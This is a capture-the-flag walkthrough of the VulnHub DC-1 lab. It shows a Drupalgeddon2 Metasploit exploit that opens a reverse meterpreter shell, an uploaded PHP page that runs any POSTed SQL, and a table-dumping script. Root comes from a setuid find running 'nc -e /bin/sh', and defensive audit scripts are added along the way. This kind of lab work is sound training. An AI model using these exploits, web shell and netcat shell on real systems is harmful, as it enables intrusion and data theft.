[Security News] A run through the DC-1 lab

Here I describe how to work through this lab from start to finish.

We need to find five flag files.

  • flag1 is in the web root.

  • flag2 is in the web application's configuration file.

  • flag3 is in the backend.

  • flag4 is in the flag4 user's home directory.

  • flag5 is in the root user's home directory.

Downloading the lab

  • Download: DC: 1 ~ VulnHub

  • After downloading, extract the archive and import the VM into VirtualBox.

Starting the lab

  • Select DC-1 and click Start.

  • Startup complete.

Gathering information about the target

  • First check the network interface. The lab VM's network adapter is in bridged mode.

  • Running ip add shows the attacking machine's address and subnet: 192.168.1.63/24

┌──(webb㉿kali)-[~]
└─$ ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast state DOWN group default qlen 1000
    link/ether 54:48:10:ee:20:b5 brd ff:ff:ff:ff:ff:ff
3: wlan0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 1c:1b:b5:5f:54:f1 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.63/24 brd 192.168.1.255 scope global dynamic noprefixroute wlan0
       valid_lft 75499sec preferred_lft 75499sec
    inet6 fe80::a122:1295:9778:7677/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
  • With the subnet known from the command above, we use nmap to find the VM's IP address.
┌──(webb㉿kali)-[~]
└─$ nmap -v -sn 192.168.1.63/24
...
Nmap scan report for DC-1 (192.168.1.69)
Host is up (0.0011s latency).
...
  • Having found the target's IP with nmap, we next enumerate its open ports, again with nmap.
┌──(webb㉿kali)-[~]
└─$ nmap -v -sV -p0-65535 -A 192.168.1.69       
...
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33604/tcp   status
|   100024  1          49960/udp   status
|   100024  1          59480/tcp6  status
|_  100024  1          60315/udp6  status
33604/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...
  • The output above shows four open ports on the target. I checked each port's service for exploitable vulnerabilities; the results are as follows.

Port    Exploitable vulnerability?
22
80
111
33604
  • The Drupal install on the target has a SQL injection vulnerability, and Metasploit happens to ship a module that exploits it.

Starting the attack

  • Start msf.
┌──(webb㉿kali)-[~]
└─$ msfconsole
...
Metasploit tip: Use help <command> to learn more 
about any command

msf6 > 
  • Search for a Drupal exploit.
msf6 > search Drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   ...
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Prop
   ...


Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval
  • Result 1 is the exploit we need.
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
  • Show the exploit's options.
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.63     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)
  • Here we only need to set RHOSTS, then run the exploit.
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.1.69
rhosts => 192.168.1.69
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit 

[*] Started reverse TCP handler on 192.168.1.63:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.1.69
[*] Meterpreter session 1 opened (192.168.1.63:4444 -> 192.168.1.69:45404 ) at 2022-03-15 22:19:58 +0800

meterpreter > 

Getting the first flag

  • First check the current working directory.
meterpreter > getwd
/var/www
  • List the files in the current directory.
meterpreter > ls
Listing: /var/www
=================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  174    fil   2013-11-21 04:45:59 +0800  .gitignore
100644/rw-r--r--  5767   fil   2013-11-21 04:45:59 +0800  .htaccess
100644/rw-r--r--  1481   fil   2013-11-21 04:45:59 +0800  COPYRIGHT.txt
100644/rw-r--r--  1451   fil   2013-11-21 04:45:59 +0800  INSTALL.mysql.txt
100644/rw-r--r--  1874   fil   2013-11-21 04:45:59 +0800  INSTALL.pgsql.txt
100644/rw-r--r--  1298   fil   2013-11-21 04:45:59 +0800  INSTALL.sqlite.txt
100644/rw-r--r--  17861  fil   2013-11-21 04:45:59 +0800  INSTALL.txt
100755/rwxr-xr-x  18092  fil   2013-11-01 18:14:15 +0800  LICENSE.txt
100644/rw-r--r--  8191   fil   2013-11-21 04:45:59 +0800  MAINTAINERS.txt
100644/rw-r--r--  5376   fil   2013-11-21 04:45:59 +0800  README.txt
100644/rw-r--r--  9642   fil   2013-11-21 04:45:59 +0800  UPGRADE.txt
100644/rw-r--r--  6604   fil   2013-11-21 04:45:59 +0800  authorize.php
100644/rw-r--r--  720    fil   2013-11-21 04:45:59 +0800  cron.php
-------------------------------------------------------------------
100644/rw-r--r--  52     fil   2019-02-19 21:20:46 +0800  flag1.txt
-------------------------------------------------------------------
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  includes
100644/rw-r--r--  529    fil   2013-11-21 04:45:59 +0800  index.php
100644/rw-r--r--  703    fil   2013-11-21 04:45:59 +0800  install.php
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  misc
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  modules
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  profiles
100644/rw-r--r--  1561   fil   2013-11-21 04:45:59 +0800  robots.txt
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  scripts
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  sites
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  themes
100644/rw-r--r--  19941  fil   2013-11-21 04:45:59 +0800  update.php
100644/rw-r--r--  2178   fil   2013-11-21 04:45:59 +0800  web.config
100644/rw-r--r--  417    fil   2013-11-21 04:45:59 +0800  xmlrpc.php
  • There is a flag file in the current directory. Read its contents.
meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.

Getting the second flag

  • Following the hint in flag1, look for the Drupal configuration file.

  • Since I'm not familiar with Drupal, I used a search engine to find an article on where it keeps its configuration.

Configuration file directory: sites/default

  • Use ls to list the files in sites/default.
meterpreter > ls sites/default
Listing: sites/default
======================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  23202  fil   2013-11-21 04:45:59 +0800  default.settings.php
040775/rwxrwxr-x  4096   dir   2019-02-19 21:10:31 +0800  files
100444/r--r--r--  15989  fil   2019-02-19 21:48:01 +0800  settings.php
  • The file we need is settings.php.

  • Viewing settings.php, the second flag appears right at the top of the file.

<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
  • From the information in the comment and the database connection password directly below it, we can guess that flag3 is in the database.

Reference: Drupal 安装 | Drupal 中文网

Getting the third flag

  • Following the hint in flag2, we use the database account and password from the configuration file to query the database.
meterpreter > shell 
Process 3232 created.
Channel 2 created.
mysql -udbuser -p
Enter password: R0ck3t
show databases;
  • Because output echoes back too slowly this way, I decided to upload a PHP file that connects to the database instead.

  • Database connection code

<?php
// Open the connection
$conn = new mysqli("localhost", "dbuser", "R0ck3t", "drupaldb");
// Check the connection
if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}

$sql = $_POST["sql"];
$result = $conn->query($sql);
echo "<pre>";
if ($result === false) {
    // query() returns false on a SQL error; report it instead of crashing on num_rows
    echo "error: " . $conn->error;
} elseif ($result === true) {
    // Statements without a result set (INSERT, UPDATE, ...) return true
    echo "ok, affected rows: " . $conn->affected_rows;
} elseif ($result->num_rows > 0) {
    // Print each row
    while ($row = $result->fetch_assoc()) {
        var_dump($row);
    }
} else {
    echo "null";
}
echo "</pre>";
$conn->close();
?>
  • Upload the file (into the Drupal root directory).
meterpreter > upload 1.php shell.php
[*] uploading  : /home/webb/1.php -> shell.php
[*] Uploaded -1.00 B of 423.00 B (-0.24%): /home/webb/1.php -> shell.php
[*] uploaded   : /home/webb/1.php -> shell.php
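As an added defender's counterpart to this upload step (example code written for this edit, not part of the original post): a Python check that parses a meterpreter-style directory listing and flags entries missing from the stock Drupal 7 root file set, which is how a newly dropped shell.php stands out. The baseline set is taken from the /var/www listing shown earlier; the sample listing and its file modes are constructed.

```python
import re

# Stock Drupal 7 root entries, taken from the /var/www listing shown earlier in the post.
DRUPAL7_ROOT_BASELINE = {
    ".gitignore", ".htaccess", "COPYRIGHT.txt", "INSTALL.mysql.txt", "INSTALL.pgsql.txt",
    "INSTALL.sqlite.txt", "INSTALL.txt", "LICENSE.txt", "MAINTAINERS.txt", "README.txt",
    "UPGRADE.txt", "authorize.php", "cron.php", "includes", "index.php", "install.php",
    "misc", "modules", "profiles", "robots.txt", "scripts", "sites", "themes",
    "update.php", "web.config", "xmlrpc.php",
}

# One row of a meterpreter `ls`: octal/perms  size  type  date time tz  name
ROW_RE = re.compile(
    r"^(?P<octal>\d{6})/[rwxsStT-]{9}\s+\d+\s+(?P<type>fil|dir)\s+"
    r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} [+-]\d{4}\s+(?P<name>\S.*)$"
)

def parse_listing(text):
    """Parse meterpreter-style listing rows; header and separator lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            entries.append({"name": m["name"], "type": m["type"],
                            "mode": int(m["octal"][-4:], 8)})
    return entries

def audit_webroot(entries, baseline=DRUPAL7_ROOT_BASELINE):
    """Flag entries absent from the baseline (candidate web shells) and world-writable ones."""
    findings = []
    for e in entries:
        if e["name"] not in baseline:
            findings.append(("unexpected_file", e["name"]))
        if e["mode"] & 0o002:
            findings.append(("world_writable", e["name"]))
    return findings

# Constructed sample: stock rows from the post plus the two files uploaded during the run.
SAMPLE_LISTING = """
Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  529    fil   2013-11-21 04:45:59 +0800  index.php
040755/rwxr-xr-x  4096   dir   2013-11-21 04:45:59 +0800  sites
100644/rw-r--r--  52     fil   2019-02-19 21:20:46 +0800  flag1.txt
100644/rw-r--r--  423    fil   2022-03-15 22:31:10 +0800  shell.php
100666/rw-rw-rw-  46634  fil   2022-03-15 22:40:02 +0800  LinEnum.sh
"""
```

Note that flag1.txt is reported too: anything not shipped with Drupal, flag or shell, is exactly what a webroot integrity check should surface.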
  • Paste the following into the Repeater module of Burp Suite.
POST /shell.php HTTP/1.1
Host: 192.168.1.69
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.3538.77 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Origin: http://192.168.1.69
DNT: 1
Connection: close
Referer: http://192.168.1.69/shell.php
Upgrade-Insecure-Requests: 1

sql=show+tables;
  • The returned data (shown as a screenshot in the original post).

  • The processed data. There are too many tables to query one at a time.
"actions"
"authmap"
"batch"
"block"
"block_custom"
"block_node_type"
"block_role"
"blocked_ips"
"cache"
"cache_block"
"cache_bootstrap"
"cache_field"
"cache_filter"
"cache_form"
"cache_image"
"cache_menu"
"cache_page"
"cache_path"
"cache_update"
"cache_views"
"cache_views_data"
"comment"
"ctools_css_cache"
"ctools_object_cache"
"date_format_locale"
"date_format_type"
"date_formats"
"field_config"
"field_config_instance"
"field_data_body"
"field_data_comment_body"
"field_data_field_image"
"field_data_field_tags"
"field_revision_body"
"field_revision_comment_body"
"field_revision_field_image"
"field_revision_field_tags"
"file_managed"
"file_usage"
"filter"
"filter_format"
"flood"
"history"
"image_effects"
"image_styles"
"menu_custom"
"menu_links"
"menu_router"
"node"
"node_access"
"node_comment_statistics"
"node_revision"
"node_type"
"queue"
"rdf_mapping"
"registry"
"registry_file"
"role"
"role_permission"
"search_dataset"
"search_index"
"search_node_links"
"search_total"
"semaphore"
"sequences"
"sessions"
"shortcut_set"
"shortcut_set_users"
"system"
"taxonomy_index"
"taxonomy_term_data"
"taxonomy_term_hierarchy"
"taxonomy_vocabulary"
"url_alias"
"users"
"users_roles"
"variable"
"views_display"
"views_view"
"watchdog"
  • Here I use Python instead of querying by hand.
import requests

# Table names returned by `show tables` above.
tables = ["actions", "authmap", "batch", "block", "block_custom", "block_node_type", "block_role", "blocked_ips",
          "cache", "cache_block", "cache_bootstrap", "cache_field", "cache_filter", "cache_form", "cache_image",
          "cache_menu", "cache_page", "cache_path", "cache_update", "cache_views", "cache_views_data", "comment",
          "ctools_css_cache", "ctools_object_cache", "date_format_locale", "date_format_type", "date_formats",
          "field_config", "field_config_instance", "field_data_body", "field_data_comment_body",
          "field_data_field_image", "field_data_field_tags", "field_revision_body", "field_revision_comment_body",
          "field_revision_field_image", "field_revision_field_tags", "file_managed", "file_usage", "filter",
          "filter_format", "flood", "history", "image_effects", "image_styles", "menu_custom", "menu_links",
          "menu_router", "node", "node_access", "node_comment_statistics", "node_revision", "node_type", "queue",
          "rdf_mapping", "registry", "registry_file", "role", "role_permission", "search_dataset", "search_index",
          "search_node_links", "search_total", "semaphore", "sequences", "sessions", "shortcut_set",
          "shortcut_set_users", "system", "taxonomy_index", "taxonomy_term_data", "taxonomy_term_hierarchy",
          "taxonomy_vocabulary", "url_alias", "users", "users_roles", "variable", "views_display", "views_view",
          "watchdog"]

# Dump every table through the uploaded shell.php and print only those whose contents mention "flag".
for table in tables:
    contents = requests.post("http://192.168.1.69/shell.php",
                             data={"sql": f"select * from {table}"}, timeout=10).text
    if "flag" in contents:
        print(f"============={table}=================")
        print(contents)
print("===end===")
  • Searching the output finds the third flag (shown as a screenshot in the original post).

    • flag3 (translated): Special perms will help find the passwd, but you need to exec that command to work out how to get what's in the shadow.

Getting the fourth flag

  • The hint in flag3 tells us to look at the passwd and shadow files. Reading them requires the right permissions.

  • Check whether we have permission to read passwd and shadow.

meterpreter > getuid
Server username: www-data
meterpreter > ls /etc/passwd
100644/rw-r--r--  1057  fil  2019-02-19 21:51:25 +0800  /etc/passwd
meterpreter > ls /etc/shadow
100640/rw-r-----  870  fil  2019-02-28 10:10:40 +0800  /etc/shadow
  • From the results above we only have permission to read passwd, so we read that file next.
meterpreter > cat /etc/passwd
...
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
  • passwd lists a flag4 user but carries no hint; I expect the hint is in the flag4 user's home directory, so let's try to access it.
meterpreter > ls /home/flag4
Listing: /home/flag4
====================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
...
100644/rw-r--r--  125   fil   2019-02-19 21:28:26 +0800  flag4.txt
  • The flag4 home directory contains a flag4.txt file; opening it gives us the fourth flag.
meterpreter > cat /home/flag4/flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy.  Or maybe it is?

Getting the fifth flag

  • From the hint in flag4, the fifth flag should be in root's home directory. We try to list it, but we do not have permission.
meterpreter > ls /root
[-] stdapi_fs_ls: Operation failed: 1
  • Since we lack permission to read root's home directory, we have to escalate privileges.
  • Here I use LinEnum.sh to gather information.

  • First upload LinEnum.sh to the target.

meterpreter > upload LinEnum.sh LinEnum.sh
[*] uploading  : LinEnum.sh -> LinEnum.sh
[*] Uploaded -1.00 B of 45.54 KiB (-0.0%): LinEnum.sh -> LinEnum.sh
[*] uploaded   : LinEnum.sh -> LinEnum.sh
  • Run LinEnum.sh
meterpreter > shell
Process 3741 created.
Channel 13 created.
bash LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

...

[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find

...
### SCAN COMPLETE ####################################
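As an added defender's counterpart to the LinEnum finding above (example code written for this edit, not part of LinEnum or the original post): a Python audit that parses ls -l style rows and reports setuid-root binaries whose name is not on an allowlist of programs expected to carry that bit. The allowlist and the sample rows are assumptions constructed for the example.

```python
import os

# SUID-root programs a stock Debian 7 host is expected to carry. This allowlist is an
# assumption for the example; build yours from a known-good image of the system you run.
EXPECTED_SUID = {
    "su", "sudo", "passwd", "chsh", "chfn", "gpasswd", "newgrp", "mount", "umount",
    "ping", "ping6", "pkexec", "dbus-daemon-launch-helper",
}

def parse_ls_line(line):
    """Split one `ls -l` style row (as LinEnum prints it) into (mode, owner, path)."""
    parts = line.split(None, 8)
    if len(parts) < 9 or len(parts[0]) != 10:
        return None
    return parts[0], parts[2], parts[8]

def is_setuid(mode):
    """An 's' or 'S' in the owner-execute slot (index 3) means the setuid bit is set."""
    return mode[3] in "sS"

def audit_suid_lines(lines, expected=EXPECTED_SUID):
    """Return paths of setuid-root files whose basename is not on the allowlist."""
    unexpected = []
    for line in lines:
        parsed = parse_ls_line(line)
        if parsed is None:
            continue
        mode, owner, path = parsed
        if is_setuid(mode) and owner == "root" and os.path.basename(path) not in expected:
            unexpected.append(path)
    return unexpected

# Constructed sample modelled on the LinEnum output above: find should stand out.
SAMPLE_LINES = [
    "-rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find",
    "-rwsr-xr-x 1 root root  45396 Apr 16  2013 /usr/bin/passwd",
    "-rwsr-xr-x 1 root root  36136 Apr  8  2013 /bin/su",
    "-rwxr-xr-x 1 root root 113416 Apr  8  2013 /bin/ls",
]
```

On a real host, feed it the ls -l rows for the setuid files found, or better, diff them against a list captured from a clean image of the same build.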
  • Here we use the setuid find binary to escalate privileges.
meterpreter > shell
Process 3741 created.
Channel 13 created.
touch dirty
find dirty -exec nc -lvp 9999 -e /bin/sh \; 
listening on [any] 9999 ...
  • Connect to the reverse shell.
┌──(webb㉿kali)-[~]
└─$ nc 192.168.1.69 9999     
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)
whoami
root
cd /root
ls
thefinalflag.txt

Reference: Linux通过第三方应用提权实战总结 (a practical summary of Linux privilege escalation via third-party applications) – FreeBuf

  • Get the fifth flag
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7